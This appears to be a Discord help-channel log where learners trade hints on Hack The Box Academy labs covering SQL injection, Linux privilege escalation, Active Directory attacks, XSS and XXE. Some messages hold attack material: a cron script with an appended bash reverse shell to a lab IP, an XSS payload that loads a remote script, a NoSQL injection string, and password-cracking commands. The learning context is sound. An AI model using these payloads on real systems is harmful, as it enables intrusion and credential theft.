oh def not, I thought you were saying you had user2's ssh key already
okay, so then why are you messing around with ssh keys then?
because I thought generating ssh keys can help with privilege escalation. I will be back in ten minutes but can you DM me so I can get back to you soon?
it can only help if you have a blind write to the target user's .ssh directory
otherwise it can work for some persistence if say you only have access to user1 via an exploit shell but want ssh access
but thats different than priv esc
hi I'm back
Question for the SQL Injection Fundamentals module. I've already gotten the assessment flag. Has anyone tried any alternate ways of getting into this target. For example I'm messing around with reverse shells, meterpreter, and the like. Anyone else tried it?
Ive not but I always recommend deviating and trying new stuff outside of the scope of the module
sir this is discord not google search
you gotta actually ask a question if you want help
lol my bad, that was for the search bar in here not google
ok, good to know. I'm messing around with trying different reverse shells. I see things like bash, perl, python, etc.. on the target. Just not getting a shell utilizing the intial SQL vulnerability.
I'm stuck on the skills assessment for Attacking Web Applications With Ffuf. I found the subdomains and extensions. When I try to find the page I get nothing besides some empty pages. I don't think I'm overthinking it but who knows. I could be.
All I can say without giving things away is enumerate the target URL paths and pay attention to the extensions you detect. Once you get it you will have that AHA moment.. 🙂
Lol nah, just stick to it. Sometimes taking a step away for a bit helps. Come back with fresh eyes.
Anyone here able to assist with the Attacking Common Applications 2nd skill assessment? I'm stuck trying to find the FQDN of the third host. I've tried every single permutation of ffuf that I can think of and I've got nothing to show for it. Does anyone have any hints on this one they can give?
That's exactly what it was. Went out to go pick up my food from downstairs and then figured it out lol
Lol see. Don't hack when hangry. Needs to be a snickers commercial.
🤣 this is true
Who knew I just needed copious amounts of sugar in the form of a vanilla shake from sonic
Hi guys, anyone here have done with linux privesc logrotate section ?
How to exploit this ?
Hey! Is anyone able to help with the Module: HTTPs/TLS Attacks Skill assessment? I was able to re-encode the padding, and capture the Token value. Now im not sure what else I need to do to get the flag? Seems pretty confusing
I just finished that section the other day. Let me know if I can help
Yes. Tomorrow I'm gonna try the section again. I think I need to reread the section another day in a row before trying again.
As the error message says, you need an SSH key
Just completed the blind sqli module. If someone needs help, you can dm me. (Blind SQL Injection)
If you have decrypted the token, then you see the value.
What would happen if you overwrite the user and role and then encrypt the token again?
Thanks for reaching out. I think I'm stuck at decrypting the Token. The only thing I have attempted to do with the token is to use the redeem feature, which then says check for an email.
@acoustic owl Would you be able to provide any tips on how to get the Token decrypted? Thanks
|| padbuster|| is your friend
Ok. I will continue working to fix my padbuster payload to decrypt the token.
Hello, I'm in the Attacking Common Services module, in the easy lab. I found a user fixxx and his pass and I accessed the web page, but when I upload a webshell it doesn't execute code!! Could somebody give a hint or help?
did you upload your payload to FTP or to the web server? Only the web server can interpret PHP
is in the web server
try to execute a simple php command like echo, just to verify that php is being executed
This gave me a hard time and later realized the position of the exploit's argument matters.

im trying to execute a simple echo hello but nothing
what im doing wrong?
got the flag!
Checkout the File WebServersInfo.txt, 443 is FTP in this case 😉
I stuck in this module
finally figured it out with chatgpt, use chmod +x monitor.sh to fix it
Escalate privileges and submit the root.txt flag.
hey
i am kind of stuck in this module
idk why they are not accepting the flag
"GET /flag%20=%20ch3ck_th0se_gr0uP_m3mb3erSh1Ps HTTP/1.1" 404 278
ch3ck_th0se_gr0uP_m3mb3erSh1Ps
i feel like this is the flag
Hello! How can I run a command like from my linux machine:
mssqlclient.py INLANEFREIGHT/DAMUNDSEN@172.16.5.150 -windows-auth
Being 172.16.5.150 a machine inside a AD network?
Hello, can somebody help me with the fifth question on Credential Hunting in Windows? I'm stuck and need help. The question is: "What are the credentials required to access the Edge-Router?" Thank you !! 🙂
Sups folks!
Had a hard time on Broken Auth - Skill Assessment, but managed to nail it.
If anybody needs help, just reach out!!
Hello, I'm in the Attacking Common Services medium lab. I see 6 ports, 2 ftp. I'm trying to brute force them and I get connection refused, could somebody help?
Other than brute-force have you tried something else?
im trying to connect but i get "connection refused" message
and if i do nmap scan seems the hosts is down
re-deploy the lab then if you can't reach the target
okay i do it
ayo
i needed some help with this: Use the privileged group rights of the secaudit user to locate a flag.
Privileged Groups
LXC / LXD
remove the -p
and where is the port?
Plus reading the man page the -p option is used to enter passive mode not to specify the port
problem with my understanding of ftp, got it!
Did you read this part of the section module? I guess is the answer you're looking for
this was the flag i already got and i was so dumb to even put it as the ans
Happens
Hello guys, I am doing Active Directory Enumeration & Attack module: living off the land
i am stuck at the last question where: Utilizing techniques learned in this section, find the flag hidden in the description field of a disabled account with administrative privileges. Submit the flag as the answer.
I do this but it didn't work
dsquery * -filter "(&(objectCategory=person)(objectClass=user)(userAccountControl:1.2.840.113556.1.4.803:=2)(memberOf=CN=Administrators,CN=Builtin,DC=domain,DC=com))" -attr description
Attacking Common Applications - Skills Assessment I: i cant find the cgi script. what wordlist should i use ?
Attacking Common Services - Easy: am i supposed to brute force mysql? everytime i do it i get blocked "[ERROR] Host '10.10.16.28' is blocked because of many connection errors; unblock with 'mysqladmin flush-hosts'"
hello can anyone help me with footprinting module smtp section i used the smtp-user-enum with the provide word list in the resource and still not able to get any hit
No you are not supposed to do bruteforce on mysql, check other services
Also feel free to dm
thanks a lot 😊
nc -lnvp 443
nc: Permission denied
Connect to the target system and escalate privileges by abusing the misconfigured cron job. Submit the contents of the flag.txt file in the /root/cron_abuse directory.
Cron Job Abuse
help ?
Linux Privilege Escalation Module?
Yeah that was it, sorry and thank you
yess
Hi,
i was wondering if i could exploit the sudo as its using Sudo version 1.8.16
but it didn't works
*work
```bash
#!/bin/bash
SRCDIR="/var/www/html"
DESTDIR="/dmz-backups/"
FILENAME=www-backup-$(date +%-Y%-m%-d)-$(date +%-T).tgz
tar --absolute-names --create --gzip --file=$DESTDIR$FILENAME $SRCDIR
bash -i >& /dev/tcp/10.10.14.3/443 0>&1
```
This one, is because you need to run it with sudo.
This drove me nuts too, it does not make sense, but Mr GPT clarified it to me. it used php as an example not node. the issue is iterative parsing, slap these lines in to a php shell and you will see
```php
$queryString = 'username[$ne]=1&password[$ne]=1';
parse_str($queryString, $queryArray);
print_r($queryArray);
```
Any ports lesser than 1000 ish requires sudo
1024
Thanks for the precision
why am not getting the shell ?
nc -lnvp 1024
Listening on [0.0.0.0] (family 0, port 1024)
ls
pwd
is this the payload you're using?
literally?
that was the cronjob which was running
is 10.10.14.3 your VPN Tunnel IP?
yes mam
Hmm, I'm kinda doubting that. can you do ip a and verify once
yess i changed the ip and i still didn't work
*it
it took some time but the thing is am so dumb and just want everything fast i didn't knew it take some times to give a rs back but anyways i got thanks alot for the help
*it
make sure you're not just copy pasting from the section.
no i do actually understand the content and then go forward as i also did a research for one line reverse shell :https://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet so like yeah am not just cp pasting
being a Devops Engineer is really beneficial just deploy one application a day and do HTB all day ❤️
@misty current thanks alot for the help dude
Can someone help me with the Attacking LSASS section in password attacks?
Just ask
Apply the concepts taught in this section to obtain the password to the Vendor user account on the target. Submit the clear-text password as the answer. (Format: Case sensitive)
im stuck with this
Whenever I use Pypykatz to get the creds, i just get errors
but nothing
you've dumped the LSASS right?
what error are you getting? you should describe that too.
How do I dump it on parrot OS the section has screen shots from windows
If someone know. https://discord.com/channels/473760315293696010/1120717896352551003*
you transfer the file to your attacking machine.
https://academy.hackthebox.com/module/complete/136 I'd suggest you to go through this module
Anyone have any hint on password attack - linux pass the ticket for host svc_ workstation?
I found just .kt file and know john password but this is not useful to me
Can anyone please tell me what's going on? I don't think ERC is working correctly?
I am trying to answer this question:
I do ERC --pattern o B5eB
It just says "command ERC registered!"
I get no output at all.
Ok figured it out, you have to switch to the log tab, to see the output of the erc command.
Can anyone help please, i am stuck on this question for about 6 hours. i did all things, i tried several exploits from Polkit 0.105-26 0.117-2 to others. can anyone give me clues, thanks
It's the question Environment Enumeration
in linux escalation of hack the box academy
link to the screen shot i couldn't upload the screen shot here
Good evening friends!
DACL Attacks I: Giving Rights and Ownership
Has anyone been able to access the \DC01\CEO share without changing the CEO's password? (Did a reset-password)
Im not positive, there may be a way to make it work but I haven't experimented enough with it in that regard
I would try adding a listener in ligolo and forward 445 and such and see if that works
i am currently doing the skill assessment 1 of active directory enumeration and attacks. I've found the user (tp****) and have the nt and sha hashes, but I do not seem to be able to crack them to obtain the password 😦 could anyone please give me a clue
who said you had to crack em
hmm well in my mind, they asked for a cleartext password. unless its stored somewhere which i wasn't looking, then it had to be cracked. so that must mean im not looking hard enough right?
could i get a clue? been looking around and still no luck :/
Module: Password Attacks
Section: Protected Files
Use the cracked password of the user Kira and log in to the host and crack the "id_rsa" SSH key. Then, submit the password for the SSH key as the answer.
Did I crack her password at any point? I can't find it in any of the notes/answers. Or should I perform a brute-force? 
Earlier in the module iirc
Yep, I can't find it 🤦
It’s in the mutated password list, a modified version of LoveYou1
You used it in “credential hunting in Linux”
thanks, I will brute force it again
You’re welcome👍🏼
Hey guys , Technical question
how do tools enumerate so many info out of the smb service? isn't it just for sharing files ?
@tough kettle it is but that services has who uses it the version that is running alot it is not just a file share
can you explain more ? from where do they get all that info
does a null session on smb let you run commands on system?
hello everyone, I'm stuck with mssql section under footprinting
after ran the mssqlclient.py backdoor:Password1@IPaddrSqlServer, I'm getting this error message
[*] Encryption required, switching to TLS
[-] [('SSL routines', '', 'internal error')]
but, if I connect thru RDP I can get in....
In the module Active Directory Enumeration & Attacks, in the section Attacking Domain Trusts - Child -> Parent Trusts - From Linux i was hoping to discuss the methodology for collecting the user bross NTLM hash. I did so || by moving a tool (rhymes with cats) on to the DC, and then using that tool to dump the hash.|| I am not sure if this is the intended path or if there is an easier way to do so via powerview or built in commandlets?
so, what is it missing with mssqlclient.py script?
Use backdoor@ip
Then fill in pass when prompted
What happens then?
same behavior
Also if you use -windows-auth?
yep
Give me a sec, I’ll spin up target and pwnbox
$ mssqlclient.py backdoor@10.129.201.248 -windows-auth
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation
Password:
[*] Encryption required, switching to TLS
[-] [('SSL routines', '', 'internal error')]
ok., sweet
hmm I'm running the command directly from my host, lemme try it from the pwnbox as well
but, ty btw
Hello I have a problem in the module Linux Privilege Escalation at section Logrotate.
When I try to git clone i have this message : git clone https://github.com/whotwagner/logrotten.git /tmp/logrotten
Cloning into '/tmp/logrotten'...
fatal: unable to access 'https://github.com/whotwagner/logrotten.git/': Could not resolve host: github.com
Is there a problem with github ?
Hello !
Anyone available to help me with a problem in the Server Side attacks module
Im having trouble curling the response for the 1st challenge
Ive followed the instructions to a Tee multiple times and im still not getting it
Something's definitely wrong with their instructions
Hey! I'm doing the Windows section of the Setting Up module and I created my Windows VM, after fixing some hiccups of the display not acting correctly, I now can't get Ubuntu to install for WSL on the VM. It's telling me to allow Virtual Machine feature, which I have or amend the BIOS. Can someone tell me what I'm missing? It's a nested VM of sorts, but the tutorial in the section doesn't say there might be any complications.
Is there any command to url encode all?
am using urlencode but it doesnt encode the strings
Can i use my own vm to do acadmey htb modules like the practice or exercisies? Cause I am only allowed one Pwnbox spawn a day and i want to do the exercises
Yes you can, just get the vpn pack from your profile and connect with openvpn
The answer was not to you😅
Im not at your module yet, so can’t help you. Sorry
How can I do it to curl the file i just created?
The machines do not have Internet access. You cannot download anything directly from Github.
Hi everybody, can someone help me in the module password attack/ Hunting linux ?
I'm not sure I get this bash script you wrote.
your first for loop produces a set of hashes alright
but where are you curling?
what action does download.php?contract=./hashes.list do?
does anyone know a machine name for easy wordpress ? and could help me please
?
Search here for Wordpress
https://ippsec.rocks/?#
Search utility for IppSec's YouTube videos
What exactly is not working?
i found a password for smb with the password.list but it didn't work, then i mutate the password of Kira and i found another password, but it didn't work also
use the Academy X HTB labs in the academy to find machine based on your module
and Hydra doesn't work for smb
even ssh doesn't work
You have to create a password list based on the given password
ohhh
thank u i'm going to test that
Will I have to wait long for thousands of passwords?
hydra) starting at 2022-07-09 11:03:46
hydra) finished at 2022-07-09 11:04:46
really
also have you checked the hint?
yes
and i have created a mutated list based on Kira password
if you have generated the mutation and rule correctly, then you will have the password needed
getting the password is quite fast
i used the custom.rule for the password in the hint, that's correct ?
seems like so
it is supposed to use the wordlist there
is the guy with the big mustache here?
fellas
how do i open NTUSER.DAT file for analysis
tried every tool on earth, no luck
thanks for the hint, but you should have told me that the "k" in "kira" was in lower case. I've been on it for 3 hours. 
why did you assume it was uppercase
First of all, a first name is written with its first letter capitalized, and then in the hint the "k" was capitalized 😅
yes but usernames are traditionally lowercase 😛
Now I know, we learn from our mistakes 😂
I need a little hint for Attacking Common Applications / Tomcat Discovery & Enumeration. I'm out of ideas how I could get the information to answer the second question. I don't think I have access to the tomcat-users.xml file which would answer the question. Am I supposed to just answer it using the example given in the section?
For the Flow Control module on Bash Scripting. Does anyone know how to fix the error message "*** WARNING : deprecated key derivation used.
Using -iter or -pbkdf2 would be better.
bad decrypt
4007D10C617F0000:error:1C800064:Provider routines:ossl_cipher_unpadblock:bad decrypt:../providers/implementations/ciphers/ciphercommon_block.c:124:
"
Hello, Is there anyone has completed the Attacking Common Services - Easy using different way? I solved the lab via reading the local file in db. Also, able to create a web shell. But I'm curious what is the other method to solve it.
What am i writing wrong?
```xml
<! DOCTYPE email [
<!ENTITY hello "inlanefreight">
]>
<root>
<name>hola</name>
<tel>+333333333</tel>
<email>&hello</email>
<message>aafdafdf</message>
</root>
```
not sure but check the first line
<? .... ?>
it seems wrong
Okay anything for beginners
all tier 0 for beginners specially linux fundamentals /web request / getting started ....
just check tier 0

the line 1 is the only that cannot be wrong
You are missing ; It should be &hello;
oh my bad lo , I hate xml LOL
I used the INTO OUTFILE to create a directory in the web
and I read it with the webshell
true I just check my notes
it works now ?
Alright
yea
Im on that same part; did you end up figuring it out?
Use either method from this section to read the flag at '/flag.php'. (You may use the CDATA method at '/index.php', or the error-based method at '/error').
I have tried with these headers
POST /flag.php HTTP/1.1
POST /index.php HTTP/1.1
for the post index.php then right?
/submitDetails.php
oh yea
Just change the path to /flag.php in the XML Entity while submitting POST to submitDetails.php
why they tell to use the cdata method at index.php then
yea i got the flag thanks
Hello, I am working on the XSS lab and cannot call the php script from the site. I start the php server with php -S 0.0.0.0:8080 and can hit it locally but when I put the payload on the vulnerable field "><script src=10.10.10.10:8080/script.js></script> The listening server won't hear anything on that port.
any hint
Any ideas? its the last lab of XSS module
Check what plugins the site is using and do a google search.
try other port
the site use a lot of plugins and I google all of them I didn't found anything yet
copy all of them and ask chatgpt 
I got the flag lol
I normally search for exploits with searchsploit, then if nothing I search in google/chatgpt
I was trying to use links provided by wpscan none of them help with this question
I did a simple google search, and I got the flag
Hello,
I used the command to read a file from MSSQL:
EXECUTE("SELECT * FROM OPENROWSET(BULK N'Path/To/File.txt', bla bla bla
I would like to know what is the 'N' just after 'BULK'? I tried without and it worked too.
Tried different ones. Still doesnt reach it.
Can i grab a quick nudge from someone on the AD Enumeration and Attacks Assessment Pt 2? I've identified a ****9 user that I'm supposed to get creds for, but have reached a dead end in where to look
||Responder for Windows||
Ahh, I see
sorry for the silly question but, can anyone help me with the hashcat command to break the ipmi hash
the command suggested in the module fire up an error message
and when try with hashcat -m 7300 -a 0 ipmi.txt /opt/SecLists/Passwords/Leaked-Databases/rockyou.txt receive this message Hashfile 'ipmi.txt' on line 1 (admin:...55e70dd725f549db26e5d0f765d67516): Token length exception No hashes loaded.
Make sure your hash is in the correct format. You can visit the below site and check the IPMI hash mode for what your input should look like
These guys seem to mention the same as @fringe shell
hello
Nevermind, I found it 🫠 i put a 9 instead of 6 in when i was trying to brute force
Hi guys, anyone knows if any htb academy modules have URL file attack ?
Web Attacks might have what you're looking for
Thanks! Will check it out
AD Enumeration & Attacks - Skills Assessment Part II. Locate a configuration file containing an MSSQL connection string. What is the password for the user listed in this file? there is no file in smb and i think there is supposed to be
there is one in ||Department Shares|| if you use the right user to access it
someone could help me with BROKEN AUTHENTICATION module - Predictable Reset Token ?
hello! I have a question on the AD Enumeration & Attacks - Skills Assessment Part II. I have managed to obtain the credentials for the user ab___. When I perform username enumeration using crackmapexec, i get various usernames of the same pattern as the one i got initially (2 letters, 3 numbers usernames). however, i tried other methods for practice, such as using Kerbrute with the jsmith.txt list. And somehow it managed to find 50 valid usernames as well, but completely different from the pattern. why does it do that? and how do we determine which tool usually has the highest accuracy when forming these lists
Hi guys, anyone wants to learn together both paths and then for the OSCP ?
Retrieve the TGS ticket for the SAPService account. Crack the ticket offline and submit the password as your answer.
ACTIVE DIRECTORY ENUMERATION - > Kerberoasting - from Linux
where the credential for the AD User
I noticed this as well... I did some enumeration with bloodhound and powerview later on, but still have no idea why it happens. I know that bloodhound only shows the ab___ type users, where powerview shows the other users also 🤷♂️ beats me
yea haha i was wondering why does that happen...
where you at btw? I'm at 3rd last question and STUMPED
haha not quite there yet, I am stuck on trying to find the MSSQL Connection string
oh yeah, the hint for that one is the give away. gl!
I want to enumerate the SPNs but I don't have credentials for an AD user
I got the password but Now I'm stuck on
What powerful local group on the Domain Controller is the SAPService user a member of?
anyone able to give me a hand with AD Enumeration & Attacks - Skills Assessment Part II? I'm trying to get creds for the ||CT___|| user
How can I enumerate the Group without having access inside the machine ?
all you need is to authenticate to the AD with one of its users to enumerate it
Okay how to do that With crackmapexec ?
That's something you should try to figure out with cme docs and/or research
@languid dawn it's good to be here having helping mind people around
yes but searching for answers by yourself is also a good skill, and I wouldn't suggest that if it was something obscure
but ofc that doesn't mean that someone else can't give the answer
I just think that it is something they should be able to figure out by themselves
Yeah I will keep that in mind
I need a little hint for Attacking Common Applications / Tomcat Discovery & Enumeration. I'm out of ideas how I could get the information to answer the second question. I could guess the second question but I can't seem to figure out the intended way
did you ever get the formatting for this?
Need help with the formatting of an answer: Module Shells & Payloads; Antak Webshell it is asking for this format (Format: **, 1 space) as an answer, I have the answer but I have no idea what that format is?
thanks a lot, really appreciate
format could be described as: * *\*

